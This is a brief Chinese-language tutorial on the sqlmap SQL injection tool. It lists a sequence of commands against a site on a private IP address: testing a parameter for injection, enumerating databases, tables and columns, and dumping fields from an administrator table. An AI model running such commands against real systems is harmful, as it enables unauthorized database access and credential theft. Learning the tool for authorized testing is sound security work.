sql 注入工具sqlmap的使用

sqlmap.py -u“http://10.6.1.54/newcontent.php?aid=79” 测试当前连接是否为注入点

 

 

 

sqlmap.py -u“http://10.6.1.54/newcontent.php?aid=79”--dbs 获取数据库列表

 

 

 

sqlmap.py -u“http://10.6.1.54/newcontent.php?aid=79”--current-db 获取当前网站所链接的数据库

 

 

 

sqlmap.py -u“http://10.6.1.54/newcontent.php?aid=79”--tables -D“目标数据库” 获取目标数据库所有表信息

 

 

 

 

sqlmap.py -u“http://10.6.1.54/newcontent.php?aid=79”--columns -T“管理员表”-D“目标数据库”

 

 

sqlmap.py -u“http://10.6.1.54/newcontent.php?aid=79”--dump -C“字段”-T“管理员表”-D“目标数据库”